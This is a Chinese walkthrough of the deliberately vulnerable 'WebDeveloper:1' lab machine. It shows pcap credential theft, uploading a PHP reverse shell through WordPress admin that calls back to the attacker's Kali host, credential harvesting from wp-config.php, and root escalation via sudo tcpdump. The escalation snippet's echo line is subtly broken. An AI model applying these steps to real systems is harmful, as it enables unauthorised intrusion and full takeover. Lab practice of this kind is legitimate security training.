WebDeveloper:1靶机

端口扫描

靶机ip地址为192.168.153.158

目录扫描

访问80端口

拼接访问 /ipdata 发现了一个流量包

放在 wireshark 查看,找到 账号密码

账号:webdeveloper

密码:Te5eQg&4sBS!Yr$)wf%(DcAd

拼接 /wp-login.php

找到登录框

登录成功

找到后台文件上传功能点

利用kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip地址改成kali的ip

上传文件

上传的文件在wp-content/uploads/目录下

kali监听

反弹成功

获得交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

/var/www/html/目录下 ,查看 wp-config.php 文件

得到数据库账号密码

账号:webdeveloper

密码:MasterOfTheUniverse

ssh连接 ssh [email protected]

连接成功

sudo提权 sudo -l

找到 php-reverse-shell.php文件位置

COMMAND='php /var/www/html/wp-content/uploads/2024/08/php-reverse-shell.php'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

反弹成功

为root权限

相关推荐
happyh h h h p p p p22 分钟前
部署DNS从服务器
运维·服务器·网络
心扬22 分钟前
python网络编程
开发语言·网络·python·tcp/ip
恰薯条的屑海鸥41 分钟前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习
Vesan,43 分钟前
网络通讯知识——通讯分层介绍,gRPC,RabbitMQ分层
网络·分布式·rabbitmq·无人机
情系淮思1 小时前
客户端和服务器已成功建立 TCP 连接【输出解析】
服务器·网络·tcp/ip
每次的天空1 小时前
Android第十五次面试总结(第三方组件和adb命令)
android
追随远方1 小时前
Android音频开发:Speex固定帧与变长帧编解码深度解析
android·音视频
消失的旧时光-19431 小时前
Android和硬件通信
android
0wioiw01 小时前
安卓基础(编译.Class)
android
0wioiw01 小时前
安卓基础(aar)
android